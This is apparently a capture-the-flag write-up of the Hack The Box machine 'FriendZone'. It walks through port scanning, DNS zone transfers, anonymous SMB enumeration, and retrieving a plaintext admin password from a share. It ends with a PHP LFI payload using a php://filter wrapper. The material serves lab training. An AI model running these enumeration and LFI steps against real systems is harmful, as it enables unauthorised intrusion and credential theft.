FriendZone
Contents
Ports scan
u505@kali:~/HTB/Machines/FriendZone$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.123 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-18 14:19:45 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 139/tcp on 10.10.10.123 Discovered open port 445/tcp on 10.10.10.123 Discovered open port 80/tcp on 10.10.10.123 Discovered open port 443/tcp on 10.10.10.123 Discovered open port 53/tcp on 10.10.10.123 Discovered open port 22/tcp on 10.10.10.123 Discovered open port 137/udp on 10.10.10.123 Discovered open port 21/tcp on 10.10.10.123 Discovered open port 53/udp on 10.10.10.123
u505@kali:~/HTB/Machines/FriendZone$ nmap -sC -sV 10.10.10.123 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 09:19 EST Nmap scan report for friendzone.htb (10.10.10.123) Host is up (0.038s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA) | 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA) |_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519) 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Friend Zone Escape software 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 443/tcp open ssl/http Apache httpd 2.4.29 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 404 Not Found | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO | Not valid before: 2018-10-05T21:02:30 |_Not valid after: 2018-11-04T21:02:30 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_clock-skew: mean: -38m51s, deviation: 1h09m16s, median: 1m07s |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: friendzone | NetBIOS computer name: FRIENDZONE\x00 | Domain name: \x00 | FQDN: friendzone |_ System time: 2020-02-18T16:21:14+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-02-18T14:21:14 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.44 seconds
Port 80
u505@kali:~/HTB/Machines/FriendZone$ curl http://10.10.10.123 <title>Friend Zone Escape software</title> <br> <center><h2>Have you ever been friendzoned ?</h2></center> <br> <center><img src="fz.jpg"></center> <br> <center><h2>if yes, try to get out of this zone ;)</h2></center> <br> <center><h2>Call us at : +999999999</h2></center> <br> <center><h2>Email us at: info@friendzoneportal.red</h2></center>
We enumerate a domain friendzoneportal.red
u505@kali:~/HTB/Machines/FriendZone$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u http://10.10.10.123
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 9221
Error Log: /opt/utils/dirsearch/logs/errors-20-02-18_09-39-32.log
Target: http://10.10.10.123
[09:39:32] Starting: [09:39:36] 403 - 300B - /.htpasswd.txt [09:39:46] 403 - 293B - /icons/ [09:39:55] 200 - 13B - /robots.txt [09:39:56] 403 - 301B - /server-status/ [09:40:01] 200 - 747B - /wordpress/
Task Completed
The robots.txt doesn't have any useful information
u505@kali:~/HTB/Machines/FriendZone$ curl http://10.10.10.123/robots.txt seriously ?!
And the wordpress folder is empty
Port 53
2 zones have been enumerated friendzone.red and friendzoneportal.red
u505@kali:~/HTB/Machines/FriendZone$ dig @10.10.10.123 axfr friendzone.red
; <<>> DiG 9.11.14-3-Debian <<>> @10.10.10.123 axfr friendzone.red ; (1 server found) ;; global options: +cmd friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 friendzone.red. 604800 IN AAAA ::1 friendzone.red. 604800 IN NS localhost. friendzone.red. 604800 IN A 127.0.0.1 administrator1.friendzone.red. 604800 IN A 127.0.0.1 hr.friendzone.red. 604800 IN A 127.0.0.1 uploads.friendzone.red. 604800 IN A 127.0.0.1 friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 ;; Query time: 39 msec ;; SERVER: 10.10.10.123#53(10.10.10.123) ;; WHEN: Tue Feb 18 10:01:13 EST 2020 ;; XFR size: 8 records (messages 1, bytes 289)
u505@kali:~/HTB/Machines/FriendZone$ dig @10.10.10.123 axfr friendzoneportal.red ; <<>> DiG 9.11.14-3-Debian <<>> @10.10.10.123 axfr friendzoneportal.red ; (1 server found) ;; global options: +cmd friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 friendzoneportal.red. 604800 IN AAAA ::1 friendzoneportal.red. 604800 IN NS localhost. friendzoneportal.red. 604800 IN A 127.0.0.1 admin.friendzoneportal.red. 604800 IN A 127.0.0.1 files.friendzoneportal.red. 604800 IN A 127.0.0.1 imports.friendzoneportal.red. 604800 IN A 127.0.0.1 vpn.friendzoneportal.red. 604800 IN A 127.0.0.1 friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 ;; Query time: 38 msec ;; SERVER: 10.10.10.123#53(10.10.10.123) ;; WHEN: Tue Feb 18 10:02:35 EST 2020 ;; XFR size: 9 records (messages 1, bytes 309)
We update our host file to add found hosts
u505@kali:~/HTB/Machines/FriendZone$ cat /etc/hosts | grep friend 10.10.10.123 friendzone.htb friendzone friendzone.red friendzoneportal.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red admin.friendzoneportal.red
Test on port 80
The port 80 doesn't seem to be influenced by the Server Name Indication (SNI not enabled on port 80), the content is exact the same as direct IP.
u505@kali:~/HTB/Machines/FriendZone$ curl http://hr.friendzone.red <title>Friend Zone Escape software</title> <br> <center><h2>Have you ever been friendzoned ?</h2></center> <br> <center><img src="fz.jpg"></center> <br> <center><h2>if yes, try to get out of this zone ;)</h2></center> <br> <center><h2>Call us at : +999999999</h2></center> <br> <center><h2>Email us at: info@friendzoneportal.red</h2></center>
Port 445
nmap enum
u505@kali:~/HTB/Machines/FriendZone$ nmap -p 445 --script=smb-enum-shares 10.10.10.123 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:14 EST Nmap scan report for friendzone.htb (10.10.10.123) Host is up (0.038s latency).
PORT STATE SERVICE 445/tcp open microsoft-ds
Host script results: | smb-enum-shares: | account_used: guest | \\10.10.10.123\Development: | Type: STYPE_DISKTREE | Comment: FriendZone Samba Server Files | Users: 0 | Max Users: <unlimited> | Path: C:\etc\Development | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.10.123\Files: | Type: STYPE_DISKTREE | Comment: FriendZone Samba Server Files /etc/Files | Users: 0 | Max Users: <unlimited> | Path: C:\etc\hole | Anonymous access: <none> | Current user access: <none> | \\10.10.10.123\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (FriendZone server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.10.123\general: | Type: STYPE_DISKTREE | Comment: FriendZone Samba Server Files | Users: 0 | Max Users: <unlimited> | Path: C:\etc\general | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.10.123\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds
enum4linux
u505@kali:~/HTB/Machines/FriendZone$ enum4linux 10.10.10.123 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb 18 10:21:03 2020
========================== | Target Information | ========================== Target ........... 10.10.10.123 RID Range ........ 500-550,1000-1050 Username ......... Password ......... Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==================================================== | Enumerating Workgroup/Domain on 10.10.10.123 | ==================================================== [+] Got domain/workgroup name: WORKGROUP
============================================ | Nbtstat Information for 10.10.10.123 | ============================================ Looking up status of 10.10.10.123 FRIENDZONE <00> - B <ACTIVE> Workstation Service FRIENDZONE <03> - B <ACTIVE> Messenger Service FRIENDZONE <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================== | Session Check on 10.10.10.123 | ===================================== [+] Server 10.10.10.123 allows sessions using username , password
=========================================== | Getting domain SID for 10.10.10.123 | =========================================== Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup
====================================== | OS information on 10.10.10.123 | ====================================== Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.10.123 from smbclient: [+] Got OS info for 10.10.10.123 from srvinfo: FRIENDZONE Wk Sv PrQ Unx NT SNT FriendZone server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03
============================= | Users on 10.10.10.123 | ============================= Use of uninitialized value $users in print at ./enum4linux.pl line 874. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
========================================= | Share Enumeration on 10.10.10.123 | =========================================
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers Files Disk FriendZone Samba Server Files /etc/Files general Disk FriendZone Samba Server Files Development Disk FriendZone Samba Server Files IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.123 //10.10.10.123/print$ Mapping: DENIED, Listing: N/A //10.10.10.123/Files Mapping: DENIED, Listing: N/A //10.10.10.123/general Mapping: OK, Listing: OK //10.10.10.123/Development Mapping: OK, Listing: OK //10.10.10.123/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
==================================================== | Password Policy Information for 10.10.10.123 | ====================================================
[+] Attaching to 10.10.10.123 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] FRIENDZONE [+] Builtin
[+] Password Info for Domain: FRIENDZONE
[+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0
[+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled Minimum Password Length: 5
============================== | Groups on 10.10.10.123 | ==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
======================================================================= | Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-3651157261-4258463691-276428382 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-22-1 and logon username , password S-1-22-1-1000 Unix User\friend (Local User) [+] Enumerating users using SID S-1-5-21-3651157261-4258463691-276428382 and logon username , password S-1-5-21-3651157261-4258463691-276428382-500 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-501 FRIENDZONE\nobody (Local User) S-1-5-21-3651157261-4258463691-276428382-502 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-503 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-504 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-505 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-506 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-507 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-508 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-509 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-510 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-511 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-512 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-513 FRIENDZONE\None (Domain Group) S-1-5-21-3651157261-4258463691-276428382-514 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-515 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-516 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-517 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-518 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-519 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-520 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-521 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-522 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-523 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-524 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-525 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-526 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-527 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-528 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-529 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-530 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-531 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-532 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-533 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-534 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-535 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-536 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-537 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-538 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-539 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-540 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-541 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-542 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-543 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-544 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-545 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-546 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-547 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-548 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-549 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-550 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1000 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1001 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1002 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1003 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1004 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1005 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1006 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1007 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1008 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1009 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1010 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1011 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1012 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1013 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1014 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1015 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1016 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1017 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1018 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1019 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1020 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1021 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1022 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1023 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1024 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1025 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1026 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1027 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1028 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1029 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1030 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1031 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1032 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1033 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1034 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1035 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1036 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1037 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1038 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1039 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1040 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1041 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1042 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1043 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1044 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1045 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1046 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1047 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1048 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1049 *unknown*\*unknown* (8) S-1-5-21-3651157261-4258463691-276428382-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-32 and logon username , password S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) S-1-5-32-504 *unknown*\*unknown* (8) S-1-5-32-505 *unknown*\*unknown* (8) S-1-5-32-506 *unknown*\*unknown* (8) S-1-5-32-507 *unknown*\*unknown* (8) S-1-5-32-508 *unknown*\*unknown* (8) S-1-5-32-509 *unknown*\*unknown* (8) S-1-5-32-510 *unknown*\*unknown* (8) S-1-5-32-511 *unknown*\*unknown* (8) S-1-5-32-512 *unknown*\*unknown* (8) S-1-5-32-513 *unknown*\*unknown* (8) S-1-5-32-514 *unknown*\*unknown* (8) S-1-5-32-515 *unknown*\*unknown* (8) S-1-5-32-516 *unknown*\*unknown* (8) S-1-5-32-517 *unknown*\*unknown* (8) S-1-5-32-518 *unknown*\*unknown* (8) S-1-5-32-519 *unknown*\*unknown* (8) S-1-5-32-520 *unknown*\*unknown* (8) S-1-5-32-521 *unknown*\*unknown* (8) S-1-5-32-522 *unknown*\*unknown* (8) S-1-5-32-523 *unknown*\*unknown* (8) S-1-5-32-524 *unknown*\*unknown* (8) S-1-5-32-525 *unknown*\*unknown* (8) S-1-5-32-526 *unknown*\*unknown* (8) S-1-5-32-527 *unknown*\*unknown* (8) S-1-5-32-528 *unknown*\*unknown* (8) S-1-5-32-529 *unknown*\*unknown* (8) S-1-5-32-530 *unknown*\*unknown* (8) S-1-5-32-531 *unknown*\*unknown* (8) S-1-5-32-532 *unknown*\*unknown* (8) S-1-5-32-533 *unknown*\*unknown* (8) S-1-5-32-534 *unknown*\*unknown* (8) S-1-5-32-535 *unknown*\*unknown* (8) S-1-5-32-536 *unknown*\*unknown* (8) S-1-5-32-537 *unknown*\*unknown* (8) S-1-5-32-538 *unknown*\*unknown* (8) S-1-5-32-539 *unknown*\*unknown* (8) S-1-5-32-540 *unknown*\*unknown* (8) S-1-5-32-541 *unknown*\*unknown* (8) S-1-5-32-542 *unknown*\*unknown* (8) S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) S-1-5-32-1003 *unknown*\*unknown* (8) S-1-5-32-1004 *unknown*\*unknown* (8) S-1-5-32-1005 *unknown*\*unknown* (8) S-1-5-32-1006 *unknown*\*unknown* (8) S-1-5-32-1007 *unknown*\*unknown* (8) S-1-5-32-1008 *unknown*\*unknown* (8) S-1-5-32-1009 *unknown*\*unknown* (8) S-1-5-32-1010 *unknown*\*unknown* (8) S-1-5-32-1011 *unknown*\*unknown* (8) S-1-5-32-1012 *unknown*\*unknown* (8) S-1-5-32-1013 *unknown*\*unknown* (8) S-1-5-32-1014 *unknown*\*unknown* (8) S-1-5-32-1015 *unknown*\*unknown* (8) S-1-5-32-1016 *unknown*\*unknown* (8) S-1-5-32-1017 *unknown*\*unknown* (8) S-1-5-32-1018 *unknown*\*unknown* (8) S-1-5-32-1019 *unknown*\*unknown* (8) S-1-5-32-1020 *unknown*\*unknown* (8) S-1-5-32-1021 *unknown*\*unknown* (8) S-1-5-32-1022 *unknown*\*unknown* (8) S-1-5-32-1023 *unknown*\*unknown* (8) S-1-5-32-1024 *unknown*\*unknown* (8) S-1-5-32-1025 *unknown*\*unknown* (8) S-1-5-32-1026 *unknown*\*unknown* (8) S-1-5-32-1027 *unknown*\*unknown* (8) S-1-5-32-1028 *unknown*\*unknown* (8) S-1-5-32-1029 *unknown*\*unknown* (8) S-1-5-32-1030 *unknown*\*unknown* (8) S-1-5-32-1031 *unknown*\*unknown* (8) S-1-5-32-1032 *unknown*\*unknown* (8) S-1-5-32-1033 *unknown*\*unknown* (8) S-1-5-32-1034 *unknown*\*unknown* (8) S-1-5-32-1035 *unknown*\*unknown* (8) S-1-5-32-1036 *unknown*\*unknown* (8) S-1-5-32-1037 *unknown*\*unknown* (8) S-1-5-32-1038 *unknown*\*unknown* (8) S-1-5-32-1039 *unknown*\*unknown* (8) S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) S-1-5-32-1042 *unknown*\*unknown* (8) S-1-5-32-1043 *unknown*\*unknown* (8) S-1-5-32-1044 *unknown*\*unknown* (8) S-1-5-32-1045 *unknown*\*unknown* (8) S-1-5-32-1046 *unknown*\*unknown* (8) S-1-5-32-1047 *unknown*\*unknown* (8) S-1-5-32-1048 *unknown*\*unknown* (8) S-1-5-32-1049 *unknown*\*unknown* (8) S-1-5-32-1050 *unknown*\*unknown* (8)
============================================= | Getting printer info for 10.10.10.123 | ============================================= No printers returned.
enum4linux complete on Tue Feb 18 10:25:12 2020
Nullinux
u505@kali:~/HTB/Machines/FriendZone$ python3 /opt/utils/nullinux/nullinux.py 10.10.10.123
Starting nullinux v5.4.1 | 02-18-2020 10:25
[*] Enumerating Shares for: 10.10.10.123 Shares Comments ------------------------------------------- \\10.10.10.123\print$ Printer Drivers \\10.10.10.123\print$ Disk Drivers \\10.10.10.123\Files FriendZone Samba Server Files /etc/Files \\10.10.10.123\general FriendZone Samba Server Files \\10.10.10.123\Development FriendZone Samba Server Files \\10.10.10.123\IPC$
[*] Enumerating: \\10.10.10.123\general . D 0 Wed Jan 16 15:10:51 2019 .. D 0 Wed Jan 23 16:51:02 2019 creds.txt N 57 Tue Oct 9 19:52:42 2018
[*] Enumerating: \\10.10.10.123\Development . D 0 Tue Feb 18 10:15:13 2020 .. D 0 Wed Jan 23 16:51:02 2019
[*] Enumerating Domain Information for: 10.10.10.123 [+] Domain Name: WORKGROUP [+] Domain SID: (NULL SID)
[*] Enumerating querydispinfo for: 10.10.10.123
[*] Enumerating enumdomusers for: 10.10.10.123
[*] Enumerating LSA for: 10.10.10.123
[*] Performing RID Cycling for: 10.10.10.123
[*] Testing 10.10.10.123 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.123
[*] 0 unique user(s) identified
Get creds.txt file
root@kali:~/HTB/Machines/FriendZone# smbclient \\\\10.10.10.123\\general Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jan 16 15:10:51 2019 .. D 0 Wed Jan 23 16:51:02 2019 creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6423220 blocks available smb: \> get creds.txt smb: \> quit
root@kali:~/HTB/Machines/FriendZone# cat creds.txt creds for the admin THING:
admin:WORKWORKHhallelujah@#
A password has been found.
Port 443
Several hostnames have been enumerated:
- friendzone.red
- administrator1.friendzone.red
- hr.friendzone.red
- uploads.friendzone.red
- friendzoneportal.red
- admin.friendzoneportal.red
- files.friendzoneportal.red
- imports.friendzoneportal.red
- vpn.friendzoneportal.red
friendzone.red
u505@kali:~/HTB/Machines/FriendZone$ curl -k https://friendzone.red <title>FriendZone escape software</title> <center><h2>Ready to escape from friend zone !</h2></center> <center><img src="e.gif"></center> <!-- Just doing some development here --> <!-- /js/js --> <!-- Don't go deep ;) -->
There is a clue at /js/js
u505@kali:~/HTB/Machines/FriendZone$ curl -k https://friendzone.red/js/js/ <p>Testing some functions !</p><p>I'am trying not to break things !</p>WVRBbEZJUmN3RDE1ODIwNDA3ODFGR2lxZ0JmYW5p<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! --> u505@kali:~/HTB/Machines/FriendZone$ curl -k https://friendzone.red/js/js/ <p>Testing some functions !</p><p>I'am trying not to break things !</p>VnZuekdsMDdPQTE1ODIwNDA3ODYxaVdMd1FqeXQw<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->
But, the text change each time, and the base64 decryption desn't seem to give us information
u505@kali:~/HTB/Machines/FriendZone$ /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u https://friendzone.red/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 9221
Error Log: /opt/utils/dirsearch/logs/errors-20-02-18_10-51-09.log
Target: https://friendzone.red/
[10:51:09] Starting: [10:51:11] 200 - 742B - /admin/ [10:51:13] 403 - 303B - /.htpasswd.txt [10:51:23] 403 - 296B - /icons/ [10:51:24] 200 - 922B - /js/ [10:51:33] 403 - 304B - /server-status/
Task Completed
The admin folder is empty
administrator1.friendzone.red
We try the credentials found in the network share.
So we visit dashboard.php
The page tell us to add parameters and give us an example image_id=a.jpg&pagename=timestamp
The parameter pagename seems that this page is vulnerable to an php LFI
We trywith the following URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=timestamp
As expected it returns a base64 line.
